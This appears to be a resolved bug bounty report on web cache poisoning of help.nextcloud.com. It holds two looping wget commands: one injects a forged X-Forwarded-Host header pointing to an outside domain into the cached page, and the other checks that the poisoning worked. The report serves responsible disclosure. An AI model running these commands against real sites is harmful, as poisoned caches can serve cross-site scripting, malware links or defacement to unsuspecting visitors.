https://help.nextcloud.com::: Web cache poisoning attack
High
N
Nextcloud
Submitted None
Actions:
Reported by
g4mm4
Vulnerability Details
Technical details and impact analysis
Hi there,
I just found the website:
https://help.nextcloud.com
is infected with "Web cache poisoning"
Abuse this bug, Attacker can:
1. Poison your cache with HTTP header with XSS included. This attack may leads to Stored XSS
2. Poison your website contains malware url (cache poisoned by attacker), maybe the user's browser (like Firefox, Chrome) will block your website (https://help.nextcloud.com)
How to reproduce the issue:
In the 1st terminal, run command likes this:
$ while true; do wget "https://help.nextcloud.com/?qwKzzSR=649227948379" --header 'X-Forwarded-Host: cyberjutsu.io/#' -qO->/dev/null; echo "poisoning...";done
In the 2nd terminal, run command below for confirmation this attack is successful:
while true; do wget "https://help.nextcloud.com/?qwKzzSR=649227948379" -qO-|grep "cyberjutsu.io"; echo "ping my payload..." ;done
Finally, this link bellow: https://help.nextcloud.com/?qwKzzSR=649227948379 was infected with "Web Cache poisoning attack".
Please see the attached image for details.
Impact
Stored XSS attack, deface website ....
Cheers,
~g4mm4
## Impact
Stored XSS attack, deface website, phishing for funs :)
Report Details
Additional information and metadata
State
Closed
Substate
Resolved